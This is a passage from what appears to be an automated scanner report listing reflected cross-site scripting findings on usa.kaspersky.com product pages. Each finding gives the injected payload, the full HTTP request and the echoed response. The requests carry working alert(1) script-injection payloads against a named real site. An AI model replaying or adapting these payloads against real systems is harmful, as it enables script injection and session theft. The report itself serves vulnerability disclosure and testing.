The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61be"-alert(1)-"f652d97614e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/home-computer-securitye61be"-alert(1)-"f652d97614e/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:09:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688573"
Content-Type: text/html; charset=utf-8
Content-Length: 32902
Date: Sat, 18 Dec 2010 16:09:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-securitye61be"-alert(1)-"f652d97614e/anti-virus-for-mac";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.287. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus-for-mac

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf902"><script>alert(1)</script>6a08317d097 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securitycf902"><script>alert(1)</script>6a08317d097/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:08:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688535"
Content-Type: text/html; charset=utf-8
Content-Length: 30403
Date: Sat, 18 Dec 2010 16:09:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securitycf902"><script>alert(1)</script>6a08317d097/anti-virus-for-mac" />
...[SNIP]...

1.288. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus-for-mac

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83aa9"-alert(1)-"5d66a3b8747 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/home-computer-security/anti-virus-for-mac83aa9"-alert(1)-"5d66a3b8747 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:12:44 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688764"
Content-Type: text/html; charset=utf-8
Content-Length: 39789
Date: Sat, 18 Dec 2010 16:13:04 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac83aa9"-alert(1)-"5d66a3b8747";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.289. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus-for-mac

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634d0"><script>alert(1)</script>bb6a86fc8eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/anti-virus-for-mac634d0"><script>alert(1)</script>bb6a86fc8eb HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:12:07 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688727"
Content-Type: text/html; charset=utf-8
Content-Length: 36024
Date: Sat, 18 Dec 2010 16:12:28 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac634d0"><script>alert(1)</script>bb6a86fc8eb" />
...[SNIP]...

1.290. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus-for-mac

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cee3b"><script>alert(1)</script>b65e494e528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/anti-virus-for-mac?cee3b"><script>alert(1)</script>b65e494e528=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:03:07 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688187"
Content-Type: text/html; charset=utf-8
Content-Length: 61774
Date: Sat, 18 Dec 2010 16:03:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac?cee3b"><script>alert(1)</script>b65e494e528=1" />
...[SNIP]...

1.291. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1258"><script>alert(1)</script>b01d5503554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesa1258"><script>alert(1)</script>b01d5503554/home-computer-security/internet-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:07:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688434"
Content-Type: text/html; charset=utf-8
Content-Length: 35408
Date: Sat, 18 Dec 2010 16:07:21 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-servicesa1258"><script>alert(1)</script>b01d5503554/home-computer-security/internet-security" />
...[SNIP]...

1.292. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba50e"-alert(1)-"2f5398bd12e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently da